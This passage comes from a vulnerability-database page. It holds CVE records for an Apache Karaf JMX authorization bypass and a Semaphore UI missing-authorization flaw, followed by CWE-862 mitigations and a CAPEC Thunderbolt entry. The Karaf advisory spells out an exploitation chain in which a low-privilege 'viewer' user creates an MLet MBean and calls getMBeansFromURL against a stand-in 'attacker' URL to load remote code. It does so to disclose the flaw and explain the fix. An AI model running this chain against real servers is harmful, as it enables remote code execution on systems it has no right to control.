because\u0026nbsp;\u003ccode\u003ejavax.management.loading.MLet\u003c/code\u003e, a standard JDK MBean, can be instantiated this way.\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;acts as a remote classloader: its\u0026nbsp;\u003ccode\u003egetMBeansFromURL(URL)\u003c/code\u003e\u0026nbsp;operation fetches an\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0027s existing \"invoke\" check, but the default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;grants the \"\u003ccode\u003eviewer\u003c/code\u003e\" role to any method name matching the wildcard rule \"\u003ccode\u003eget* = viewer\u003c/code\u003e\", a heuristic intended for read-only getters. Because \"\u003ccode\u003egetMBeansFromURL\u003c/code\u003e\" happens to start with \"\u003ccode\u003eget\u003c/code\u003e\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u0026nbsp;\u003ccode\u003eMLet\u003c/code\u003e\u0026nbsp;at all. Combined with the createMBean gap, this gives a \"\u003ccode\u003eviewer\u003c/code\u003e\"-role JMX client a path to remote code execution to the Karaf JVM:\u003c/div\u003e\u003cdiv\u003e\u003col\u003e\u003cli\u003eAuthenticate to JMX as any user with any role (e.g. \"\u003ccode\u003eviewer\u003c/code\u003e\").\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.createMBean(\"javax.management.loading.MLet\", objectName)\u003c/code\u003e\u0026nbsp;is not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, MLet is instantiated and registered.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u003c/code\u003e\u0026nbsp;is guarded, but the method name matches the default \"\u003ccode\u003eget* = viewer\u003c/code\u003e\" ACL rule, so permitted.\u003c/li\u003e\u003cli\u003eThe remote\u0026nbsp;\u003ccode\u003e.mlet\u003c/code\u003e\u0026nbsp;file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\u003c/li\u003e\u003cli\u003e\u003ccode\u003embs.unregisterMBean(objectName)\u003c/code\u003e\u0026nbsp;can be used to remove the MLet afterwards, also not in\u0026nbsp;\u003ccode\u003eGUARDED_OPERATIONS\u003c/code\u003e, no RBAC check, no audit trail.\u003c/li\u003e\u003c/ol\u003e\u003c/div\u003e\u003cdiv\u003eThe fix adds\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eregisterMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eunregisterMBean\u003c/code\u003e\u0026nbsp;to the guarded operation list, resolves required roles for them from the\u0026nbsp;\u003ccode\u003ejmx.acl*\u003c/code\u003e\u0026nbsp;configuration by\u0026nbsp;\u003ccode\u003eObjectName\u003c/code\u003e\u0026nbsp;and (for\u0026nbsp;\u003ccode\u003ecreateMBean\u003c/code\u003e/\u003ccode\u003eregisterMBean\u003c/code\u003e) MBean class name, and ships default\u0026nbsp;\u003ccode\u003eetc/jmx.acl.cfg\u003c/code\u003e\u0026nbsp;entries restricting all three operations to the \"\u003ccode\u003eadmin\u003c/code\u003e\" role. This allows deployments to also write class-name-specific rule, e.g.:\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003ecreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"\u003ccode\u003eadmin\u003c/code\u003e\" JMX credentiels.\u003c/div\u003e"
            }
          ],
          "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u00a0KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy\u00a0around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u00a0MBeanInvocationHandler#guarded:\n\n\n\u00a0 private final List\u003cString\u003e guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\n\n\n\n\nThe MBean lifecycle operations\u00a0MBeanServer#createMBean,\u00a0#registerMBean\u00a0and\u00a0#unregisterMBean\u00a0are not in this list. Calls to these methods are forwarded directly to the underlying\u00a0MBeanServer\u00a0with no role check at all, regardless of the roles configured in\u00a0etc/jmx.acl.*.cfg.\n\n\n\n\nAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"viewer\" role, can call\u00a0createMBean()\u00a0to instantiate an arbitrary class as a MBean, and\u00a0unregisterMBean()\u00a0to remove it again afterwards, with no authorization check and no audit log entry (logging in\u00a0KarafMBeanServerGuard\u00a0only occurs on the RBAC-denial path, which this bypass never reaches).\n\n\n\n\nThis is significant because\u00a0javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way.\u00a0MLet\u00a0acts as a remote classloader: its\u00a0getMBeansFromURL(URL)\u00a0operation fetches an\u00a0MLet\u00a0text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through\u00a0KarafMBeanServerGuard\u0027s existing \"invoke\" check, but the default\u00a0etc/jmx.acl.cfg\u00a0grants the \"viewer\" role to any method name matching the wildcard rule \"get* = viewer\", a heuristic intended for read-only getters. Because \"getMBeansFromURL\" happens to start with \"get\", it also matches that rule, so a default installation grants \"viewer\" callers permission to invoke it without any Karaf-specific ACL naming\u00a0MLet\u00a0at all. Combined with the createMBean gap, this gives a \"viewer\"-role JMX client a path to remote code execution to the Karaf JVM:\n\n  *  Authenticate to JMX as any user with any role (e.g. \"viewer\").\n  *  mbs.createMBean(\"javax.management.loading.MLet\", objectName)\u00a0is not in\u00a0GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered.\n  *  mbs.invoke(objectName, \"getMBeansFromURL\", new Object[]{\"http://attacker/mlet.txt\"}, ...)\u00a0is guarded, but the method name matches the default \"get* = viewer\" ACL rule, so permitted.\n  *  The remote\u00a0.mlet\u00a0file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.\n  *  mbs.unregisterMBean(objectName)\u00a0can be used to remove the MLet afterwards, also not in\u00a0GUARDED_OPERATIONS, no RBAC check, no audit trail.\n\n\nThe fix adds\u00a0createMBean,\u00a0registerMBean\u00a0and\u00a0unregisterMBean\u00a0to the guarded operation list, resolves required roles for them from the\u00a0jmx.acl*\u00a0configuration by\u00a0ObjectName\u00a0and (for\u00a0createMBean/registerMBean) MBean class name, and ships default\u00a0etc/jmx.acl.cfg\u00a0entries restricting all three operations to the \"admin\" role. This allows deployments to also write class-name-specific rule, e.g.:\n\n\n\n\ncreateMBean(java.lang.String)[/javax\\.management\\.loading\\..*/] = admin\n\n\n\n\nApache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-\"admin\" JMX credentiels."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "text": "important"
            },
            "type": "Textual description of severity"
          },
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-29T08:40:07.961Z",
        "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "shortName": "apache"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://karaf.apache.org/security/cve-2026-92142.txt"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Apache Karaf: Authorization bypass in JMX MBean lifecycle operations",
      "x_generator": {
        "engine": "Vulnogram 1.0.3"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
    "assignerShortName": "apache",
    "cveId": "CVE-2026-92142",
    "datePublished": "2026-09-29T08:40:07.961Z",
    "dateReserved": "2026-09-15T16:59:01.764Z",
    "dateUpdated": "2026-10-01T14:24:03.845Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-91994 (GCVE-0-2026-91994)

Vulnerability from cvelistv5 – Published: 2026-09-15 11:35 – Updated: 2026-09-24 14:22
VLAI
Title
Semaphore UI through 2.19.12 Missing Authorization on GET and HEAD Requests
Summary
Semaphore UI through 2.19.12 exempts GET and HEAD requests from project resource permission checks in GetMustCanMiddleware. Attackers with guest or task_runner roles can read all project environments including plaintext secrets, credentials, and passwords via GET requests to the environment endpoint.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-15 12:36 UTC
CWE
Impacted products
Vendor Product Version
semaphoreui semaphore Affected: 0 , ≤ 2.19.12 (semver)
Create a notification for this product.
Date Public
2026-08-16 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-91994",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-15T12:36:45.634709Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-15T12:36:59.210Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:golang/github.com/semaphoreui/semaphore",
          "product": "semaphore",
          "repo": "https://github.com/semaphoreui/semaphore",
          "vendor": "semaphoreui",
          "versions": [
            {
              "lessThanOrEqual": "2.19.12",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "George Chen"
        }
      ],
      "datePublic": "2026-08-16T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Semaphore UI through 2.19.12 exempts GET and HEAD requests from project resource permission checks in GetMustCanMiddleware. Attackers with guest or task_runner roles can read all project environments including plaintext secrets, credentials, and passwords via GET requests to the environment endpoint."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-24T14:22:33.738Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "GitHub Issue #4150",
          "tags": [
            "issue-tracking",
            "exploit"
          ],
          "url": "https://github.com/semaphoreui/semaphore/issues/4150"
        },
        {
          "name": "GetMustCanMiddleware at v2.19.12",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/semaphoreui/semaphore/blob/v2.19.12/api/projects/project.go#L89-L106"
        },
        {
          "name": "projectUserAPI environment routes at v2.19.12",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/semaphoreui/semaphore/blob/v2.19.12/api/router.go#L308-L329"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://github.com/semaphoreui/semaphore"
        },
        {
          "name": "VulnCheck Advisory: Semaphore UI through 2.19.12 Missing Authorization on GET and HEAD Requests",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/semaphore-ui-through-2.19.12-missing-authorization-on-get-and-head-requests"
        }
      ],
      "title": "Semaphore UI through 2.19.12 Missing Authorization on GET and HEAD Requests",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-91994",
    "datePublished": "2026-09-15T11:35:49.385Z",
    "dateReserved": "2026-09-15T11:11:13.312Z",
    "dateUpdated": "2026-09-24T14:22:33.738Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.